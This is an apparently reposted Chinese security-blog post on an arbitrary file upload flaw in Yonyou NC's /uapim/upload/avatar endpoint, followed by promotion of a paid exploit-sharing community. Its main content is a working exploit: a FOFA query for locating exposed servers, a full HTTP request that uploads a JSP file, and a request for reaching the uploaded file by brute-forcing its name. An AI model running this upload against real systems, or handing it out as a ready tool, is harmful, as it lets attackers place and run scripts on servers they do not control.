用友 NC avatar 任意文件上传

admin 2024年3月2日19:04:07评论81 views1字数 1349阅读4分29秒阅读模式
用友 NC avatar 任意文件上传

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

用友 NC avatar 任意文件上传

用友 NC acatar接口存在任意文件上传漏洞,可上传恶意脚本至服务器。

01

空间搜索语法

用友 NC avatar 任意文件上传

FoFa

body="/Client/Uclient/UClient.exe"

02

利用过程

用友 NC avatar 任意文件上传

系统页面如下

用友 NC avatar 任意文件上传

上传文件数据包如下:

POST /uapim/upload/avatar?usercode=qbll&fileType=jsp HTTP/1.1Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 242Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----v6bavojmqudas7g0al2o------v6bavojmqudas7g0al2oContent-Disposition: form-data; name="uploadedfile"; filename="klywwjrrux.jsp"<%out.print("lmnpl");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------v6bavojmqudas7g0al2o--

用友 NC avatar 任意文件上传

在上传文件后,需要爆破落地文件名称,得到最终访问路径。

GET /uapim/static/pages/photo/qbll/qbll.1703855300049.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate, br

用友 NC avatar 任意文件上传

03

nuclei poc

用友 NC avatar 任意文件上传

用友 NC avatar 任意文件上传

获取脚本关注本公众号后发送:20240302

04

周末福利

用友 NC avatar 任意文件上传

考虑到团队运营成本和公众号福利发放,创建知识星球欢迎各位师傅打赏💰后期会用打赏的资金去做福利。星球的性价比真的比较可观,绝对不会因为某些身外之物水文章,安全圈很小,主要是和师傅们交个朋友。还请各位师傅监督团队后边的表现,将心比心!

进入星球你能直接收获到:

  1. 优先于公众号的POC更新(提前一两周~~

  2. 定制化的成品工具开发

  3. 私人定制的客户需求(要求不要太过分呦~~)

  4. 实战技巧、攻防思路

  5. 杂七杂八的技术小福利

  6. 根据能力不定期的星球内部抽奖

  7. 更多漏洞利用Tips

欢迎各位师傅加入哦~~

用友 NC avatar 任意文件上传

进入星球直接能学习到这些漏洞:

用友 NC avatar 任意文件上传

关注我们

原文始发于微信公众号(天澜实验室):用友 NC avatar 任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月2日19:04:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 NC avatar 任意文件上传https://cn-sec.com/archives/2541237.html

发表评论

匿名网友 填写信息